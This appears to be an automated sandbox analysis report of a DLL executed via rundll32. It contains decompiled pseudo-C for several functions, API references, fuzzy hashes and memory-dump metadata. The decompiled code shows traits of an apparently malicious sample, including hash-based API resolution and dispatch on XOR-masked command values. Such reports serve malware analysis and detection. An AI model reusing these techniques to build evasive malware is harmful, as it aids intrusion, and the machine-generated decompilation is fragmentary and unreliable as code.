                  • Instruction ID: 6b8e83564c84abddb59c8c95e9bb71b7576c070b9c7c9cfbfdeb8062ede7394d
                  • Opcode Fuzzy Hash: fe13ca55ced21057dd33dceaeca19e1809f43a7503c78fa45138f0264a1560c7
                  • Instruction Fuzzy Hash: 65A18032204A8986EBA6DF66E4543DA7791FB8DBC4F48C015EA8D47755DF38C64EC700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 53%
                  			E00000001180005748(void* __ecx, signed int __edx, signed long long __rbx, void* __rcx, void* __rdx, void* __r8) {
                  				void* __rdi;
                  				void* __rsi;
                  				signed int _t35;
                  				void* _t69;
                  				void* _t80;
                  				char* _t113;
                  				signed long long _t116;
                  				char* _t124;
                  				void* _t142;
                  				void* _t145;
                  				char* _t147;
                  				signed long long _t150;
                  				void* _t152;
                  				void* _t153;
                  				long _t169;
                  				void* _t170;
                  				void* _t172;
                  				void* _t175;
                  
                  				_t116 = __rbx;
                  				 *((long long*)(_t152 + 8)) = __rbx;
                  				 *(_t152 + 0x18) = _t150;
                  				_t153 = _t152 - 0x40;
                  				_t113 =  *0x8000d4a0;
                  				r15d =  *0x8000d498;
                  				_t35 = r15d ^ __edx;
                  				_t146 = __r8;
                  				_t170 = __rcx;
                  				_t4 = _t150 + 1; // 0x1
                  				_t80 = _t4;
                  				if (_t35 == 0x139d2b8d) goto 0x8000588d;
                  				if (_t35 == 0x15f5a8c2) goto 0x80005865;
                  				if (_t35 == 0x2f77acf9) goto 0x8000588b;
                  				if (_t35 == 0x31f2972e) goto 0x80005861;
                  				if (_t35 == 0x48e12436) goto 0x80005965;
                  				if (_t35 == 0x4d382929) goto 0x80005905;
                  				if (_t35 == 0x7f513d6b) goto 0x80005863;
                  				if (_t35 == 0xb016dc39) goto 0x80005852;
                  				if (_t35 == 0xb057dfc9) goto 0x800057e4;
                  				goto 0x800059bb;
                  				if (r9d == 0) goto 0x80005848;
                  				E000000011800024CC(r9d, __rbx, __r8, __r8, _t175);
                  				if (_t113 == 0) goto 0x8000583e;
                  				 *(_t153 + 0x20) =  *(_t153 + 0x20) & _t116;
                  				if (E00000001180002668(_t113, _t116, _t170, 0x180001844, _t146, _t150, _t113,  *((intOrPtr*)(_t153 + 0x90))) != 0) goto 0x8000582b;
                  				goto 0x800059bb;
                  				HeapFree(_t172, _t169, _t142);
                  				goto 0x800059bb;
                  				goto 0x800059bb;
                  				goto 0x800059bb;
                  				SetEvent(_t145);
                  				goto 0x800059bb;
                  				if (r9d == 0) goto 0x80005848;
                  				_t124 = _t113;
                  				E000000011800024CC(r9d, _t116, _t124, _t146);
                  				_t147 = _t113;
                  				if (_t113 == 0) goto 0x8000583e;
                  				if (_t80 + _t80 != 2) goto 0x800058ae;
                  				goto 0x800058c2;
                  				if ( *((intOrPtr*)(_t124 + 0x50)) == 0) goto 0x800058ec;
                  				WaitForSingleObject(??, ??);
                  				asm("sbb ebx, ebx");
                  				goto 0x800058f1;
                  				_t139 =  ==  ? 0x18000543c : 0x180001b7c;
                  				 *(_t153 + 0x20) =  *(_t153 + 0x20) & _t150;
                  				if (E00000001180002668(0x18000543c, _t116, _t170,  ==  ? 0x18000543c : 0x180001b7c, _t147, _t150, _t147,  *((intOrPtr*)(_t153 + 0x90))) == 0) goto 0x80005821;
                  				goto 0x8000582e;
                  				if (_t80 == 0) goto 0x800059bb;
                  				if (0x426 != 0x426) goto 0x800059bb;
                  				if (_t147 == 0) goto 0x8000595f;
                  				if ( *_t147 == 0) goto 0x8000595f;
                  				memset(??, ??, ??);
                  				if (E000000011800020DC(0x18000543c, _t116, _t147, _t153 + 0x30, _t147) != 0) goto 0x8000595d;
                  				if (E000000011800038F8(_t147, _t153 + 0x30, _t153 + 0x78) == 0) goto 0x8000595f;
                  				asm("ror ax, 0x8");
                  				 *((short*)(_t153 + 0x32)) =  *(_t153 + 0x78) & 0x0000ffff;
                  				if (0 != 0) goto 0x800059bb;
                  				if ( *(_t170 + 0x50) == 0) goto 0x8000599a;
                  				 *(_t170 + 0x50) =  *(_t170 + 0x50) & 0x00000000;
                  				E00000001180007950(0,  *((intOrPtr*)( *0x8000d4a0 + 8)),  *(_t170 + 0x50), _t113,  *(_t170 + 0x50), _t150);
                  				HeapFree(??, ??, ??);
                  				goto 0x8000599f;
                  				if (_t80 == 0) goto 0x800059bb;
                  				_t69 = E00000001180001A88( *((intOrPtr*)( *0x8000d4a0 + 8)), _t153 + 0x30, _t113,  *(_t170 + 0x50), _t150,  *((intOrPtr*)(_t170 + 0x38)), _t170 + 0x50);
                  				if ( *((long long*)(_t153 + 0x90)) == 0) goto 0x800059e1;
                  				if (_t69 == 0x3e5) goto 0x800059e1;
                  				r8d = _t69;
                  				E00000001180005600( *((intOrPtr*)( *0x8000d4a0 + 8)), _t170,  *((intOrPtr*)(_t153 + 0x90)), _t150);
                  				return _t69;
                  			}





















                  0x180005748
                  0x180005748
                  0x18000574d
                  0x18000575a
                  0x18000575e
                  0x180005765
                  0x180005777
                  0x180005779
                  0x18000577c
                  0x18000577f
                  0x18000577f
                  0x180005787
                  0x180005792
                  0x18000579d
                  0x1800057a8
                  0x1800057b3
                  0x1800057be
                  0x1800057c9
                  0x1800057d4
                  0x1800057db
                  0x1800057df
                  0x1800057e7
                  0x1800057ef
                  0x1800057fa
                  0x180005804
                  0x18000581f
                  0x180005826
                  0x180005833
                  0x180005839
                  0x180005843
                  0x18000584d
                  0x180005856
                  0x18000585c
                  0x180005868
                  0x18000586d
                  0x180005870
                  0x180005875
                  0x18000587b
                  0x180005880
                  0x180005889
                  0x180005894
                  0x18000589c
                  0x1800058a4
                  0x1800058ac
                  0x1800058be
                  0x1800058ca
                  0x1800058de
                  0x1800058e7
                  0x1800058f3
                  0x1800058ff
                  0x18000590d
                  0x180005912
                  0x180005926
                  0x18000593a
                  0x18000594d
                  0x180005954
                  0x180005958
                  0x180005963
                  0x18000596d
                  0x180005976
                  0x180005983
                  0x180005990
                  0x180005998
                  0x1800059a1
                  0x1800059b9
                  0x1800059c4
                  0x1800059cc
                  0x1800059d6
                  0x1800059dc
                  0x1800059fb

                  APIs
                  • HeapFree.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180005833
                  • SetEvent.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180005856
                  • WaitForSingleObject.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 000000018000589C
                  • memset.NTDLL(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180005926
                  • HeapFree.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180005990
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: FreeHeap$EventObjectSingleWaitmemset
                  • String ID: ))8M$6$H$lJu
                  • API String ID: 2222956709-2816507560
                  • Opcode ID: 538479323d73f129c12b3b5a05446ce4d9924ad14fd915045617832929b37bdd
                  • Instruction ID: 785fb66ca69b8b0f02f3e946b07437a251f863b49ae3d9a65a40210c3f307c76
                  • Opcode Fuzzy Hash: 538479323d73f129c12b3b5a05446ce4d9924ad14fd915045617832929b37bdd
                  • Instruction Fuzzy Hash: 9A61B231205B4D86FBE7DA56A4843EB3291A74DBD2F54C026FE895B7D5DE28CA4EC300
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 28%
                  			E00000001180003A24(long long __rbx, long long* __rcx, void* __rdx, long long __rsi, void* __r8, void* __r9) {
                  				void* __rdi;
                  				long _t49;
                  				void* _t54;
                  				void* _t72;
                  				signed long long _t94;
                  				signed long long _t95;
                  				long long* _t97;
                  				int _t112;
                  				void* _t113;
                  				signed long long _t118;
                  				void* _t120;
                  				long long* _t126;
                  				void* _t128;
                  				signed long long _t129;
                  				void* _t131;
                  
                  				 *((long long*)(_t120 + 8)) = __rbx;
                  				 *(_t120 + 0x10) = _t118;
                  				 *((long long*)(_t120 + 0x18)) = __rsi;
                  				_t116 =  *0x8000d4a0;
                  				_t113 = __r9;
                  				_t97 = __rcx;
                  				if (__r9 != 0) goto 0x80003a5b;
                  				goto 0x80003be2;
                  				r8d = 0x10;
                  				memcpy(_t131, _t128, _t112);
                  				InitializeCriticalSection(??);
                  				_t6 = _t97 + 0x88; // 0x88
                  				_t126 = _t6;
                  				 *((long long*)(__rcx + 0xa0)) = 0x180002f24;
                  				_t129 = _t128 | 0xffffffff;
                  				 *((long long*)(__rcx + 0xa8)) = E00000001180007A7C;
                  				r13d = _t129 + 2;
                  				r9d = 0;
                  				r8d = 0;
                  				 *((long long*)(__rcx + 0x98)) = E00000001180008368;
                  				 *((long long*)(__rcx + 0x90)) = _t126;
                  				 *_t126 = _t126;
                  				 *(__rcx + 0x10) = _t129;
                  				CreateEventA(??, ??, ??, ??);
                  				 *((long long*)(__rcx + 0x20)) = E00000001180008368;
                  				if (E00000001180008368 == 0) goto 0x80003bd6;
                  				r9d = 0;
                  				r8d = 0;
                  				CreateEventA(??, ??, ??, ??);
                  				 *((long long*)(__rcx + 0x30)) = E00000001180008368;
                  				if (E00000001180008368 == 0) goto 0x80003bd6;
                  				 *(__rcx + 0x38) =  *(__rcx + 0x38) & _t118;
                  				r8d = 0;
                  				CreateMutexA(??, ??, ??);
                  				 *((long long*)(__rcx + 0x28)) = E00000001180008368;
                  				 *(__rcx + 0x38) = E00000001180008368;
                  				if (E00000001180008368 == 0) goto 0x80003bd6;
                  				E00000001180001C00(0, __rcx, __r9, __r9,  *0x8000d4a0, _t118);
                  				 *_t97 = E00000001180008368;
                  				E0000000118000459C(0x176fdd38, E00000001180008368,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
                  				_t72 = _t129 + 7;
                  				if (E00000001180008368 == 0) goto 0x80003b4c;
                  				r8d = _t72;
                  				E00000001180008368(_t54, E00000001180008368,  *((intOrPtr*)( *0x8000d4a0 + 0x30)), _t118);
                  				goto 0x80003b4f;
                  				_t94 = _t129;
                  				 *(_t97 + 0x10) = _t94;
                  				if (_t94 != _t129) goto 0x80003bb0;
                  				E0000000118000459C(0xb27f4910, _t94,  *((intOrPtr*)(_t116 + 0x30)));
                  				if (_t94 == 0) goto 0x80003b79;
                  				 *_t94();
                  				goto 0x80003b7b;
                  				if (0 != 0) goto 0x80003bd6;
                  				E0000000118000459C(0x176fdd38, _t94,  *((intOrPtr*)(_t116 + 0x30)));
                  				if (_t94 == 0) goto 0x80003ba4;
                  				r8d = _t72;
                  				 *_t94();
                  				goto 0x80003ba7;
                  				_t95 = _t129;
                  				 *(_t97 + 0x10) = _t95;
                  				if (_t95 == _t129) goto 0x80003bd6;
                  				_t28 = _t97 + 0x18; // 0x18
                  				E00000001180006C8C(2, _t95, _t97, E0000000118000431C, _t97, _t116, _t118, _t28);
                  				 *(_t97 + 8) = _t95;
                  				if (_t95 == 0) goto 0x80003bd6;
                  				SwitchToThread();
                  				goto 0x80003c03;
                  				_t49 = GetLastError();
                  				if (_t49 == 0) goto 0x80003c03;
                  				E00000001180007950(r13d, _t97, _t97, _t113, _t116, _t118);
                  				if (r13d == 0) goto 0x80003c03;
                  				E0000000118000459C(0x9cb92d3f, _t95,  *((intOrPtr*)(_t116 + 0x30)));
                  				if (_t95 == 0) goto 0x80003c03;
                  				 *_t95();
                  				return _t49;
                  			}


















                  0x180003a24
                  0x180003a29
                  0x180003a2e
                  0x180003a3f
                  0x180003a48
                  0x180003a4b
                  0x180003a51
                  0x180003a56
                  0x180003a5f
                  0x180003a65
                  0x180003a6e
                  0x180003a74
                  0x180003a74
                  0x180003a82
                  0x180003a89
                  0x180003a94
                  0x180003aa2
                  0x180003aa7
                  0x180003aaa
                  0x180003ab2
                  0x180003ab9
                  0x180003ac0
                  0x180003ac3
                  0x180003ac7
                  0x180003acd
                  0x180003ad4
                  0x180003ada
                  0x180003add
                  0x180003ae5
                  0x180003aeb
                  0x180003af2
                  0x180003af8
                  0x180003afc
                  0x180003b03
                  0x180003b09
                  0x180003b0d
                  0x180003b14
                  0x180003b1f
                  0x180003b29
                  0x180003b30
                  0x180003b35
                  0x180003b3d
                  0x180003b42
                  0x180003b48
                  0x180003b4a
                  0x180003b4c
                  0x180003b4f
                  0x180003b56
                  0x180003b61
                  0x180003b69
                  0x180003b75
                  0x180003b77
                  0x180003b7d
                  0x180003b8b
                  0x180003b93
                  0x180003b95
                  0x180003ba0
                  0x180003ba2
                  0x180003ba4
                  0x180003ba7
                  0x180003bae
                  0x180003bb0
                  0x180003bbe
                  0x180003bc3
                  0x180003bca
                  0x180003bcc
                  0x180003bd4
                  0x180003bd6
                  0x180003be0
                  0x180003be5
                  0x180003bec
                  0x180003bf7
                  0x180003bff
                  0x180003c01
                  0x180003c21

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: CloseCriticalHandleSection$CreateEvent$DeleteEnterErrorFreeHeapInitializeLastLeaveMutexObjectSingleSleepSwitchThreadWaitmemcpy
                  • String ID:
                  • API String ID: 810493412-0
                  • Opcode ID: b816b6a790a3b77e0cb1c9170e0e56660fdfce69cd924edd7d4bea04d9f1c9d6
                  • Instruction ID: da56e0963138b123f8a3a91eab94b9da458cf35c37d31fe2a2e97a6efbfc397b
                  • Opcode Fuzzy Hash: b816b6a790a3b77e0cb1c9170e0e56660fdfce69cd924edd7d4bea04d9f1c9d6
                  • Instruction Fuzzy Hash: 5F51C332301B4882EB97DF22A4117DA73A8FB8CBD8F448524AE5D47795EF38CA09C350
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 54%
                  			E00000001180002B60(void* __esi, long long __rcx, void* __r9, void* __r10, signed long long __r11) {
                  				void* __rbx;
                  				void* __rdi;
                  				void* __rsi;
                  				void* __rbp;
                  				void* _t79;
                  				signed int _t94;
                  				void* _t143;
                  				void* _t144;
                  				long long _t174;
                  				long long* _t175;
                  				long long* _t178;
                  				void* _t180;
                  				long long _t182;
                  				void* _t190;
                  				intOrPtr _t211;
                  				void* _t224;
                  				long long _t225;
                  				long long _t228;
                  				void* _t229;
                  				void* _t255;
                  				signed long long _t256;
                  
                  				_t256 = __r11;
                  				_t255 = __r10;
                  				_t144 = __esi;
                  				_t174 = _t228;
                  				_t229 = _t228 - 0x60;
                  				r12d =  *0x8000d498;
                  				 *(_t174 + 0x20) =  *(_t174 + 0x20) & 0x00000000;
                  				_t225 = __rcx;
                  				if (E00000001180002464(_t174, _t180,  *0x8000d4a0 + 0x28, __rcx) != 0) goto 0x80002bd9;
                  				_t79 = E00000001180002464(_t174, _t180,  *0x8000d4a0 + 0x20, _t225);
                  				if (_t79 == 0) goto 0x80002bd9;
                  				HeapFree(??, ??, ??);
                  				if (_t79 != 0) goto 0x80002f0d;
                  				_t190 = _t229 + 0x48;
                  				if (E00000001180008C60(_t180, _t190, _t224, _t225) != 0) goto 0x80002ed2;
                  				r9d =  *( *((intOrPtr*)(_t225 + 0x40)) + 2) & 0x0000ffff;
                  				if (_t190 - __r9 + 8 <= 0) goto 0x80002c2b;
                  				if ((r12d ^ 0xe49a1e6d) == 0) goto 0x80002c2d;
                  				E00000001180004ED8(r12d ^ 0xe49a1e6d, __r9 +  *((intOrPtr*)(_t225 + 0x40)) + 8);
                  				_t182 = _t174;
                  				goto 0x80002c2d;
                  				if (_t182 == 0) goto 0x80002ec8;
                  				_t21 = _t225 + 0xb0; // 0xb0
                  				 *((long long*)(_t229 + 0x28)) = _t182;
                  				 *(_t229 + 0x20) =  *(_t229 + 0x20) & 0x00000000;
                  				if (E000000011800022AC(_t182, _t174, _t182, _t21,  *((intOrPtr*)(_t229 + 0x48)), _t225,  *0x8000d490,  *((intOrPtr*)(_t225 + 0x30)),  *((intOrPtr*)(_t225 + 0x38))) != 0) goto 0x80002ec8;
                  				_t175 =  *((intOrPtr*)(_t225 + 0x28));
                  				 *((long long*)(_t229 + 0x40)) = _t175;
                  				if (E00000001180002370(r12d ^ 0x61f25585, _t175, _t182, _t256) != 0) goto 0x80002caf;
                  				if (E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)),  *((intOrPtr*)(_t229 + 0x48)), _t229 + 0xa8) == 0) goto 0x80002caf;
                  				goto 0x80002cb8;
                  				 *(_t229 + 0xa8) = 0;
                  				E0000000118000459C(0xab05e147, _t175,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
                  				r15d = 0x7f;
                  				if (_t175 == 0) goto 0x80002cec;
                  				r9d = 0;
                  				r8d = 0;
                  				 *_t175();
                  				goto 0x80002cef;
                  				if (r15d != 0x102) goto 0x80002ec8;
                  				 *(_t225 + 0x64) = 0x3e8;
                  				if (E00000001180002370(r12d ^ 0x64d094d6, _t175, _t182, _t256) != 0) goto 0x80002d41;
                  				 *(_t229 + 0x20) =  *(_t229 + 0x20) & 0x00000000;
                  				r9d = 0;
                  				E00000001180002668(_t175, _t182, _t225, 0x180001844, _t225,  *0x8000d490,  *((intOrPtr*)(_t229 + 0x38)), _t229 + 0xb0);
                  				if (E00000001180002370(r12d ^ 0xdd4632ba, _t175, _t182, _t256) != 0) goto 0x80002d8f;
                  				if (E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)), 0x180001844, _t229 + 0xa8) == 0) goto 0x80002d8f;
                  				_t94 =  *(_t229 + 0xa8);
                  				if (_t94 == 0) goto 0x80002d8f;
                  				 *(_t225 + 0x64) = _t94 * 0x3e8;
                  				if (E00000001180002370(r12d ^ 0x705ce798, _t175, _t182, _t256) != 0) goto 0x80002dd2;
                  				if (E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)), 0x180001844, _t229 + 0xa8) == 0) goto 0x80002dd2;
                  				goto 0x80002ddb;
                  				 *(_t229 + 0xa8) = 0;
                  				r12d = r12d ^ 0xe5c7ba87;
                  				if (E00000001180002370(r12d, _t175, _t182, _t256) != 0) goto 0x80002e40;
                  				if (E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)), 0x180001844, _t229 + 0xb8) == 0) goto 0x80002e40;
                  				GetSystemTimeAsFileTime(??);
                  				r11d =  *((intOrPtr*)(_t229 + 0xb8));
                  				 *((intOrPtr*)(_t225 + 0x60)) = r11d;
                  				_t178 = _t256 * 0x23c34600 +  *((intOrPtr*)(_t229 + 0x50));
                  				 *((long long*)(_t225 + 0x58)) = _t178;
                  				if (E00000001180007DBC(0, E000000011800038F8( *((intOrPtr*)(_t229 + 0x38)), 0x180001844, _t229 + 0xb8), _t225, _t229 + 0x58, _t229 + 0x30) != 0) goto 0x80002e68;
                  				r8d =  *((intOrPtr*)(_t229 + 0x30));
                  				E0000000118000137C(_t144, _t182, _t225,  *((intOrPtr*)(_t229 + 0x58)), _t255);
                  				E0000000118000459C(0xab05e147, _t178,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
                  				if (_t178 == 0) goto 0x80002e97;
                  				r8d = 0;
                  				r9d = 0;
                  				r9d = r9d * 0x3e8;
                  				 *_t178();
                  				goto 0x80002e9a;
                  				_t143 = r15d;
                  				if (_t143 != 0) goto 0x80002e40;
                  				if ( *((intOrPtr*)(_t225 + 0x50)) == 0) goto 0x80002ec8;
                  				E00000001180007950(0xab05e147,  *((intOrPtr*)( *0x8000d4a0 + 8)),  *((intOrPtr*)(_t225 + 0x50)), _t224,  *((intOrPtr*)(_t225 + 0x50)),  *0x8000d490);
                  				HeapFree(??, ??, ??);
                  				E00000001180002620();
                  				_t211 =  *0x8000d4a0;
                  				if ( *((intOrPtr*)(_t211 + 0x20)) == 0) goto 0x80002ef8;
                  				HeapFree(??, ??, ??);
                  				if ( *((intOrPtr*)(_t211 + 0x28)) == 0) goto 0x80002f0d;
                  				HeapFree(??, ??, ??);
                  				asm("lock inc ecx");
                  				return _t143;
                  			}
























                  0x180002b60
                  0x180002b60
                  0x180002b60
                  0x180002b60
                  0x180002b6d
                  0x180002b7f
                  0x180002b86
                  0x180002b8a
                  0x180002ba9
                  0x180002bb7
                  0x180002bc0
                  0x180002bd3
                  0x180002bdb
                  0x180002be1
                  0x180002bef
                  0x180002bfc
                  0x180002c11
                  0x180002c1a
                  0x180002c21
                  0x180002c26
                  0x180002c29
                  0x180002c30
                  0x180002c43
                  0x180002c4a
                  0x180002c4f
                  0x180002c5d
                  0x180002c63
                  0x180002c80
                  0x180002c8c
                  0x180002ca4
                  0x180002cad
                  0x180002cb1
                  0x180002cc1
                  0x180002cc6
                  0x180002ccf
                  0x180002ce0
                  0x180002ce3
                  0x180002ce6
                  0x180002cea
                  0x180002cf5
                  0x180002d14
                  0x180002d22
                  0x180002d29
                  0x180002d36
                  0x180002d3c
                  0x180002d61
                  0x180002d79
                  0x180002d7b
                  0x180002d84
                  0x180002d8c
                  0x180002daf
                  0x180002dc7
                  0x180002dd0
                  0x180002dd4
                  0x180002ddb
                  0x180002dfc
                  0x180002e14
                  0x180002e1b
                  0x180002e21
                  0x180002e2c
                  0x180002e37
                  0x180002e3c
                  0x180002e54
                  0x180002e56
                  0x180002e63
                  0x180002e71
                  0x180002e79
                  0x180002e7b
                  0x180002e7e
                  0x180002e8a
                  0x180002e91
                  0x180002e95
                  0x180002e97
                  0x180002e9c
                  0x180002ea5
                  0x180002eb5
                  0x180002ec2
                  0x180002ecd
                  0x180002ed2
                  0x180002ee3
                  0x180002eeb
                  0x180002eff
                  0x180002f07
                  0x180002f0d
                  0x180002f23

                  APIs
                    • Part of subcall function 0000000180002464: LoadLibraryA.KERNELBASE(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 0000000180002476
                    • Part of subcall function 0000000180002464: FreeLibrary.KERNEL32(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 00000001800024A7
                  • HeapFree.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 0000000180002BD3
                  • GetSystemTimeAsFileTime.KERNEL32 ref: 0000000180002E1B
                  • HeapFree.KERNEL32 ref: 0000000180002EC2
                  • HeapFree.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 0000000180002EEB
                  • HeapFree.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 0000000180002F07
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Free$Heap$LibraryTime$FileLoadSystem
                  • String ID:
                  • API String ID: 1415693639-0
                  • Opcode ID: 5e368ffbea44e81b77d41e8b41b472461b0af584182af94ce1e612372c450cfb
                  • Instruction ID: d455ad72a2173ea311d53c287058b5208197830efbff1c216518b590d8193917
                  • Opcode Fuzzy Hash: 5e368ffbea44e81b77d41e8b41b472461b0af584182af94ce1e612372c450cfb
                  • Instruction Fuzzy Hash: A5A15172204B8996EBA2DB66E4407DA73A5F78D7D4F448022FA4D47A95DF38C64AC700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.765331866.00007FFE35481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFE35480000, based on PE: true
                  • Associated: 00000004.00000002.765324849.00007FFE35480000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000004.00000002.765340158.00007FFE35482000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000004.00000002.765346850.00007FFE35483000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000004.00000002.765488940.00007FFE35505000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffe35480000_rundll32.jbxd
                  Similarity
                  • API ID: AttributeConsoleText
                  • String ID: &$($)$+$0$<$@$F$G$P$S$T$U$U$U$V$a$b$f$p
                  • API String ID: 646522457-3871696196
                  • Opcode ID: 9cdcb3ff4fa943342d4f4e675a6d7142e126a27ecaa70f92b8817774fc8ac274
                  • Instruction ID: c3b09f64314ecbb0240905c6f5f7e06ab2b0d6cd3abd21b140db4b14cfcacf30
                  • Opcode Fuzzy Hash: 9cdcb3ff4fa943342d4f4e675a6d7142e126a27ecaa70f92b8817774fc8ac274
                  • Instruction Fuzzy Hash: 1851F47280C3C2C5F3158364A85C33FAE919762B49F151077E2CB45AEAD6AEF148FB16
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: ErrorFileLast$EventWrite$CloseCodeCreateExitHandleMultipleNamedObjectsPeekPipeProcessReadResetResumeThreadWait
                  • String ID: .RK
                  • API String ID: 1606758550-3354657194
                  • Opcode ID: e535ec2e64825705009bac7a413637230dfc8d2d18d7f6c6a3e224415b496589
                  • Instruction ID: c67b93fc325dec5a333161014b43f1cf91cc3d00d80d1a92eadb22293fcdf481
                  • Opcode Fuzzy Hash: e535ec2e64825705009bac7a413637230dfc8d2d18d7f6c6a3e224415b496589
                  • Instruction Fuzzy Hash: 6C614032314A49D2EB92CB25E9947DA73E0FB8C7C5F408121FB8987A94DF38D658DB10
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$Free$Alloc$CriticalSectionlstrlen$EnterEscapeLeavelstrcpymemcpy
                  • String ID:
                  • API String ID: 1109037607-0
                  • Opcode ID: d44f845e7b71ac1e4097b2ef269f920d9d6927053d5c93f366d8a1b5ec574062
                  • Instruction ID: acf6d717728defc35103db72fb922d6f00203a7e454cd640fbdac6a35d594990
                  • Opcode Fuzzy Hash: d44f845e7b71ac1e4097b2ef269f920d9d6927053d5c93f366d8a1b5ec574062
                  • Instruction Fuzzy Hash: F0519A35304B8986EB96CB67A8447DA73A5FB8DFC4F44C025EE4A83754EE39C609C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: CloseHandle$CriticalSection$Sleep$DeleteEnterEventFreeHeapLeaveObjectSingleWait
                  • String ID:
                  • API String ID: 2177250193-0
                  • Opcode ID: 077b512303bddf46be07a072b110e746afb00398c40a4b8bf0a8799af97e695f
                  • Instruction ID: f3fed24fe94b1aa8e153d29e7a34276cc5438fe7d956490b47d4b11a712edef8
                  • Opcode Fuzzy Hash: 077b512303bddf46be07a072b110e746afb00398c40a4b8bf0a8799af97e695f
                  • Instruction Fuzzy Hash: EA31F536701A4986EB96DF62E8503AD3360FB98FD4F44C021EA5E936A5DF38CA4DC701
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
